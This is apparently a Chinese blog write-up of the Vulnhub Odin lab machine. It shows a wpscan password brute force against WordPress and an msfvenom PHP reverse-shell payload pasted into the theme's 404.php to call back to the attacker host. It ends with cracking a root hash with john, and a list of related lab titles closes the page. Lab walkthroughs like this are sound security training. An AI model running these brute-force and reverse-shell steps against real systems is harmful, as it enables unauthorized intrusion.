靶机下载地址:https://download.vulnhub.com/odin/odin.ova

靶机描述:

  • 一、环境信息

靶机:192.168.163.139

攻击机:192.168.163.128

  • 二、信息收集

Nmap -sS -A -n -p- 192.168.163.139

这里可以看到开放了80端口

访问后是加载不出来的,在靶机描述里其实有提示需要我们将靶机添加到hosts里

将192.168.163.139 odin添加到hosts里后再次访问页面就会有网页弹出来了

大概浏览了一下这个网页并没有什么有用的信息

我们接着使用dirb扫描一下网页后台

这里可以看到有一个wp-admin页面,这个可以说是很熟悉了

我先尝试了一下1234的用户名,根据它的回显是没有这个用户

我再尝试了admin弱口令登录,这次它回显的是我的密码出现错误,可以看出是有admin这个用户的

现在我们用户名有了就该尝试爆破密码了

这里我用的是kali自带的字典

命令:wpscan –url http://192.168.163.139 -U admin -P /usr/share/wordlists/rockyou.txt

爆破出来密码

账号 admin

密码 qwerty

现在我们就可以登录wp-admin了

接下来的操作就非常的熟悉了

先找到404.php页面

然后制作一个反弹shell木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.163.128 lport=4444

这里我就不放到文件里面了,直接复制到404.php里就好了

开启监听

反弹shell

三、提权

脱shell后要优化终端,这个靶机没有python只有python3

使用python3一样的优化终端

在做这种wp网页的靶机时,我们要习惯查看网页后台的配置文件

在最下面有一个root用户加密过的密码

我们使用john对它进行解密

这样我们就得到root用户的密码jasmine

切换到root用户

去到root目录,查看flag,这个靶机的flag不跟其他的靶机一样就叫flag.txt root.txt什么的,这个flag的文件是作者的名字

文件里面是一串base64编码,再解码后是一个网页连接,里面是一段音乐,因为要翻墙这里我就不演示了

总的来说这个靶机还是比较简单的,虽然有些绕

对于wp网页后台,我们经常拿到用户名密码就再修改404.php页面反弹shell,这里我再演示用msfconsole反弹shell

vulnhub-Odin相关推荐

  1. VulnHub渗透测试实战靶场 - Odin:1

    VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...

  2. 三星手机如何分屏_刷机基础知识三星如何手机进入ODIN模式

    提示:点击上面的蓝字可以快速关注我们. 经常刷机的三星用户对ODIN这个词肯定都再熟悉不过了,不过仍然有许多新手用户对于如何进入ODIN模式还是一知半解,所以抽空整理了一下,如有写错的地方请大家纠正一 ...

  3. easyui表格编辑事件_Unity手游开发札记——从Odin插件聊基于元数据的编辑器实现

    Metadata is data that provides information about other data. 最近一个多月的时间在全力做新项目的Demo,由于程序暂时还只有我一个人,所以从 ...

  4. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  5. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  6. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  7. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  8. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  9. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  10. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

最新文章

  1. 推荐个所见即所得的编辑器
  2. 导出数据生成excel
  3. opencv2.4.9报错找不到opencv_video249d.dll
  4. java 课后习题 三角形面积计算
  5. 影响线型缩聚物分子量的因素_高分子化学试题
  6. ASP.NET会话(Session)保存模式
  7. 好用到让设计师尖叫的UI设计网格素材
  8. h3c交换机配置telnet_H3C路由器交换机配置 命令行操作基础 视频学习
  9. 菜鸟笔记 -- Chapter 6.4.2 详解继承
  10. 学校计算机房要求,学校机房建设包含哪些内容以及相关的标准(参考)一
  11. USB 3.0 高清音视频采集芯片——MS2130
  12. python安装失败0x80070005_win10系统运行提示0x80070005错误的解决办法
  13. 经典例题:编写一个程序,从键盘输入一串字符,统计这串字符中英文字母、数字、其他字符号的字符数。
  14. html ua ios,iOS 修改默认 UserAgent
  15. 删除文件后,磁盘可用空间并没有释放怎么办?
  16. PPC气箱脉冲除尘器
  17. U3D客户端框架之 拓展StringBuilder实现InsertNoGC、IndexOf、LastIndexOf、ReplaceNoGC、AppendNoGC API 减少GC
  18. Cortex-M4 浮点数的存储 和 FPU(Floating Point Unit) 杂记
  19. 转载 web缓存技术
  20. cuda10.1的一步步详细安装记录

热门文章

  1. 数字调制系统工作原理_图文讲解液压系统溢流阀分类与工作原理
  2. 南京邮电大学《管理学原理C》2019/2020 学年第 2 学期期末试卷
  3. python三维地质建模_GemPy三维地质建模工具包
  4. java excel 数组公式_excel 数组公式
  5. 谈谈RJ45线序的打法及口诀
  6. opencv实现银行卡卡号识别
  7. 欧姆龙新​​ 3D AOI 系统中的软件和人工智能
  8. 关于Lua的下载以及wlua、luac等文件的解释
  9. idea上maven引用jar出错(The POM for xxx is missing, no dependen)
  10. c语言打印图形 原理,C语言打印各种图形